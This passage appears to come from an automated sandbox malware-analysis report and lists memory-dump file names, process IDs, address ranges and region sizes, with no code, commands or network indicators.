                                                                                                                                                                                    • memory/4220-431-0x0000000000000000-mapping.dmp
                                                                                                                                                                                    • memory/4244-391-0x0000000000000000-mapping.dmp
                                                                                                                                                                                    • memory/4244-409-0x0000000004D50000-0x0000000004D51000-memory.dmp
                                                                                                                                                                                      Filesize

                                                                                                                                                                                      4KB

                                                                                                                                                                                    • memory/4268-187-0x0000000000000000-mapping.dmp
                                                                                                                                                                                    • memory/4292-190-0x0000000000000000-mapping.dmp
                                                                                                                                                                                    • memory/4292-207-0x0000000000030000-0x0000000000033000-memory.dmp
                                                                                                                                                                                      Filesize

                                                                                                                                                                                      12KB

                                                                                                                                                                                    • memory/4340-305-0x00000269886A0000-0x000002698870F000-memory.dmp
                                                                                                                                                                                      Filesize

                                                                                                                                                                                      444KB

                                                                                                                                                                                    • memory/4340-307-0x0000026988710000-0x00000269887DF000-memory.dmp
                                                                                                                                                                                      Filesize

                                                                                                                                                                                      828KB

                                                                                                                                                                                    • memory/4340-194-0x0000000000000000-mapping.dmp
                                                                                                                                                                                    • memory/4576-406-0x0000000004FA0000-0x0000000004FA1000-memory.dmp
                                                                                                                                                                                      Filesize

                                                                                                                                                                                      4KB

                                                                                                                                                                                    • memory/4576-353-0x0000000000000000-mapping.dmp
                                                                                                                                                                                    • memory/4600-349-0x0000000000000000-mapping.dmp
                                                                                                                                                                                    • memory/4644-226-0x0000000000000000-mapping.dmp
                                                                                                                                                                                    • memory/4708-560-0x0000000000000000-mapping.dmp
                                                                                                                                                                                    • memory/4908-315-0x0000000004C20000-0x0000000005226000-memory.dmp
                                                                                                                                                                                      Filesize

                                                                                                                                                                                      6.0MB

                                                                                                                                                                                    • memory/4908-279-0x0000000000418F7A-mapping.dmp
                                                                                                                                                                                    • memory/4908-277-0x0000000000400000-0x000000000041E000-memory.dmp
                                                                                                                                                                                      Filesize

                                                                                                                                                                                      120KB

                                                                                                                                                                                    • memory/4936-281-0x0000000000418F76-mapping.dmp
                                                                                                                                                                                    • memory/4936-309-0x00000000050F0000-0x00000000056F6000-memory.dmp
                                                                                                                                                                                      Filesize

                                                                                                                                                                                      6.0MB

                                                                                                                                                                                    • memory/4980-326-0x0000000000000000-mapping.dmp
                                                                                                                                                                                    • memory/5044-327-0x0000000005010000-0x000000000550E000-memory.dmp
                                                                                                                                                                                      Filesize

                                                                                                                                                                                      5.0MB

                                                                                                                                                                                    • memory/5044-296-0x000000000041905A-mapping.dmp
                                                                                                                                                                                    • memory/5060-420-0x0000000000000000-mapping.dmp
                                                                                                                                                                                    • memory/5076-270-0x0000000000000000-mapping.dmp
                                                                                                                                                                                    • memory/5148-443-0x0000000000000000-mapping.dmp
                                                                                                                                                                                    • memory/5176-446-0x0000000000000000-mapping.dmp
                                                                                                                                                                                    • memory/5224-448-0x0000000000000000-mapping.dmp
                                                                                                                                                                                    • memory/5236-520-0x0000000000000000-mapping.dmp
                                                                                                                                                                                    • memory/5248-450-0x0000000000000000-mapping.dmp
                                                                                                                                                                                    • memory/5276-568-0x0000000000000000-mapping.dmp
                                                                                                                                                                                    • memory/5284-453-0x0000000000000000-mapping.dmp
                                                                                                                                                                                    • memory/5336-455-0x0000000000000000-mapping.dmp
                                                                                                                                                                                    • memory/5360-457-0x0000000000000000-mapping.dmp
                                                                                                                                                                                    • memory/5372-458-0x0000000000000000-mapping.dmp
                                                                                                                                                                                    • memory/5436-462-0x0000000000000000-mapping.dmp
                                                                                                                                                                                    • memory/5500-466-0x0000000000000000-mapping.dmp
                                                                                                                                                                                    • memory/5540-468-0x0000000000000000-mapping.dmp
                                                                                                                                                                                    • memory/5628-474-0x0000000000000000-mapping.dmp
                                                                                                                                                                                    • memory/5648-476-0x0000000000000000-mapping.dmp
                                                                                                                                                                                    • memory/5716-478-0x0000000000000000-mapping.dmp
                                                                                                                                                                                    • memory/5896-491-0x0000000000000000-mapping.dmp
                                                                                                                                                                                    • memory/6052-504-0x00007FF6C6D54060-mapping.dmp